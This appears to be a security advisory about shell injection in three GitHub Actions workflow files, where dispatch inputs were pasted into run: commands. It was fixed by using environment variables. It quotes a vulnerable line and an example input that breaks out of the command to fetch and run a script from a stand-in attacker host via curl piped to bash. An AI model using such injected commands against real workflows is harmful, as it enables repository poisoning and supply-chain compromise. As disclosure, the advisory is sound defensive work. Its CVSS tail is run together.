Three GitHub Actions workflow files contained 10 shell injection points where
user-controlled workflow_dispatch inputs were interpolated directly into shell
commands via ${{ }} expression syntax. An attacker with repository write access
could inject arbitrary shell commands, leading to repository poisoning and supply
chain compromise affecting all downstream users.
| Workflow file | Injection points |
|------------------------------------------|------------------|
| .github/workflows/maven-version.yml | 4 |
| .github/workflows/cherrypick.yml | 5 |
| .github/workflows/maven-release.yml | 1 |
GitHub Actions ${{ }} expressions inside run: blocks are substituted before
the shell interprets the command. When a workflow_dispatch input is placed directly
in a run: block, an attacker who can trigger the workflow can break out of the
intended command and execute arbitrary code.
maven-version.yml (before fix)- name: Set the name of the branch
run: echo "PR_BRANCH=action/${{ github.event.inputs.next_version }}" >> "$GITHUB_ENV"
A malicious input such as 1.0.0"; curl attacker.com/backdoor.sh | bash; echo "
would be interpolated directly into the shell, executing arbitrary commands with
the job's GITHUB_TOKEN permissions (contents: write, pull-requests: write).
contents: write token (push malicious commits)Fixed in two PRs merged into release 8.39.0:
Replaced all direct ${{ inputs.* }} interpolation in run: blocks with
environment variable indirection. Inputs are...
8.39.0Exploitability
AV:NAC:LPR:HUI:NScope
S:CImpact
C:HI:HA:H9.1/CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H